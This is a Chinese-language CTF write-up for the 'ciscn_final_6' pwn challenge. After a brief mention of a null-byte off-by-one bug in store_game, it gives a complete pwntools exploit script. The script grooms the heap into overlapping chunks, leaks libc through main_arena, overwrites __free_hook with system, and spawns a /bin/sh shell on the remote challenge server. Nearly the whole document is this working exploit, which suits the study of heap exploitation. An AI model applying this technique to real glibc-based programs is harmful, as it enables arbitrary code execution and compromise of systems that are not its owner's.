ciscn_final_6

ciscn_final_6

首先,检查一下程序的保护机制

ciscn_final_6_第1张图片

然后,我们IDA分析一下,在store_game函数里的getInput存在null off by one漏洞

ciscn_final_6_第2张图片

常规的null off by one漏洞,只是本题逻辑复杂了一点,需要精心构造一下。

#coding:utf8
from pwn import*

#sh = process('./ciscn_final_6')
sh = remote('node3.buuoj.cn',27827)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

def resume():
   sh.sendlineafter('>','0')

def new_game():
   sh.sendlineafter('>','1')
   sh.sendlineafter("what's your name?","haivk")
   sh.sendlineafter('input you ops count','0')

def load_game(index):
   sh.sendlineafter('>','2')
   sh.sendlineafter('index?',str(index))

def store_game(size = 0,comment = ''):
   sh.sendlineafter('>','3')
   if size == 0:
      sh.sendafter('any comment?','N')
   else:
      sh.sendafter('any comment?','Y')
      sh.sendlineafter('comment size?',str(size))
      sh.sendafter('plz input comment',comment)

def delete_record(index):
   sh.sendlineafter('>','4')
   sh.sendlineafter('index?',str(index))

def show_record():
   sh.sendlineafter('>','5')

#0
new_game()
store_game(0xF0,'a'*0xF0)
#1
new_game()
store_game()
#2
new_game()
store_game(0xF0,'a'*0xF0)
#3~9
for i in range(7):
   new_game()
   store_game(0xF0,'a'*0xF0)
#10
new_game()
store_game()
#11
new_game()
store_game()
#12
new_game()
store_game()

for i in range(3,10):
   delete_record(i)

delete_record(0)
delete_record(2)
#0、2~7
for i in range(7):
   new_game()
   store_game(0xF0,'a'*0xF0)

delete_record(10)
#8
new_game()
store_game(0xF0,'a'*0xF0)
#9
delete_record(11)
new_game()
store_game(0xF0,'a'*0xF0)
#10
delete_record(12)
new_game()
#null off by one
store_game(0x18,'a'*0x10 + p64(0x100 + 0x20 + 0x30 + 0x20 + 0x30))
#填满tcache bin
delete_record(0)
for i in range(2,8):
   delete_record(i)
#合并,形成overlap chunk
delete_record(9)
delete_record(8)
#0、2~7
for i in range(7):
   new_game()
   store_game(0xF0,'a'*0xF0)
#8,将glibc指针移动到下一个chunk
new_game()
store_game(0xF0,'a'*0xF0)

load_game(1)
sh.recvuntil('X:')
main_arena_xx = int(sh.recvuntil(',',drop = True))
sh.recvuntil('Y:')
main_arena_xx = main_arena_xx + (int(sh.recvuntil(';',drop = True)) << 32)
sh.sendlineafter('input you ops count','0')
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
#9
new_game()
store_game(0x60,'/bin/sh'.ljust(0x40,'\x00') + p64(0) + p64(0x31) + p64(free_hook_addr) + '\n')
#10
#写free_hook
new_game()
store_game(0x20,p64(system_addr) + '\n')
#getshell
delete_record(9)

sh.interactive()

 

你可能感兴趣的:(pwn,二进制漏洞,CTF)